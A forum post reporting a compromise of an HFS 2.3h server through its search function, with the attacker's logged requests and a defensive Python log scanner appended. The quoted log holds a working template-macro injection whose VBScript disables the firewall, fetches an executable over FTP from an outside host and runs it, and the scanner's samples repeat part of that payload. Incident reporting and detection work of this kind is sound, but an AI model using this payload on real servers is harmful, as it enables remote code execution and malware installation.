I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a VBScript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and am waiting for a fix.
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}
I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.
A similar exploit has been mentioned before in this forum:
https://www.exploit-db.com/exploits/34668/
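As an added example (not part of the original post, and not HFS's own code), the script below scans HFS-style access-log lines for the pattern visible in the log above: a `?search=` query that carries a NUL byte followed by a `{.save|...}` or `{.exec|...}` template macro, and reports the macro name and the file it targets. The sample log lines are constructed from the post's log with the VBScript payload shortened and a made-up second client added for contrast. The two filter functions at the end are a generic illustration of why a NUL byte defeats a check that stops at the first NUL (the behaviour the poster observed when testing with and without the NUL); they are an assumption for illustration, not a reproduction of HFS's parser.

```python
"""Scan HFS-style access-log lines for NUL-byte + template-macro search requests.

Added example for the forum post above; not HFS code.
"""
import re

# Constructed sample lines modelled on the HFS log quoted in the post.
# "\x00" stands for the NUL byte the poster saw after "?search==";
# the payload is shortened. The last two lines are a benign search and a
# plain download from a made-up client, to show what is NOT flagged.
SAMPLE_LOG = [
    '2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search==\x00'
    '{.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell"")",'
    '"*",Chr(32)):Execute(a).}',
    '2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K',
    '2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search==\x00{.exec|6.vbs|.}',
    '2016-06-13 16:02:10 192.0.2.7 2200 Requested GET /?search=report',
    '2016-06-13 16:02:11 192.0.2.7 2200 Requested GET /docs/readme.txt',
]

# "<date> <time> <ip> <port> Requested <method> <path>" as in the post's log.
LOG_RE = re.compile(r'^(\S+ \S+) (\S+) (\d+) Requested (\S+) (.*)$')

# HFS template macro: "{.name|arg|...}" or "{.name|arg.}"; capture name and first arg.
MACRO_RE = re.compile(r'\{\.(\w+)\|([^|]*?)(?:\||\.\})')


def analyse_request(raw_line):
    """Return a finding dict for a 'Requested' log line, or None for other lines."""
    m = LOG_RE.match(raw_line.rstrip('\r\n'))
    if not m:
        return None
    ts, ip, port, method, path = m.groups()
    # If the log stored the request percent-encoded, "%00" must become a NUL here.
    from urllib.parse import unquote
    decoded = unquote(path)
    query = decoded.partition('?')[2]          # text after the first '?', if any
    macros = MACRO_RE.findall(query)           # [(name, first_arg), ...]
    finding = {
        'time': ts,
        'ip': ip,
        'port': int(port),
        'method': method,
        'nul_in_query': '\x00' in query,
        'macros': macros,                      # e.g. [('save', '6.vbs')]
    }
    # Either signal alone is worth an alert: a NUL never belongs in a search
    # string, and a template macro in user input is the injection itself.
    finding['suspicious'] = finding['nul_in_query'] or bool(macros)
    return finding


def scan_log(lines):
    """Return only the suspicious findings from an iterable of log lines."""
    return [f for f in (analyse_request(line) for line in lines)
            if f is not None and f['suspicious']]


def passes_naive_filter(query):
    """Illustrative (assumed, not HFS code): a check that treats the query as a
    NUL-terminated C string only sees the text before the NUL, finds no '{.'
    there, and lets the request through. True means 'not blocked'."""
    visible = query.split('\x00', 1)[0]
    return '{.' not in visible


def passes_full_filter(query):
    """The same check over the whole buffer sees the macro marker and blocks it."""
    return '{.' not in query


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']}: NUL={f['nul_in_query']} macros={f['macros']}")
    q = SAMPLE_LOG[2].partition('?')[2]
    print('naive filter lets it through:', passes_naive_filter(q))
    print('full-length filter lets it through:', passes_full_filter(q))
```

Run against a real HFS log, the script flags both of the poster's requests (the `save` that wrote `6.vbs` and the `exec` that ran it) and leaves the ordinary search and download alone; the only thing to adapt is `LOG_RE` if a different HFS log template is in use.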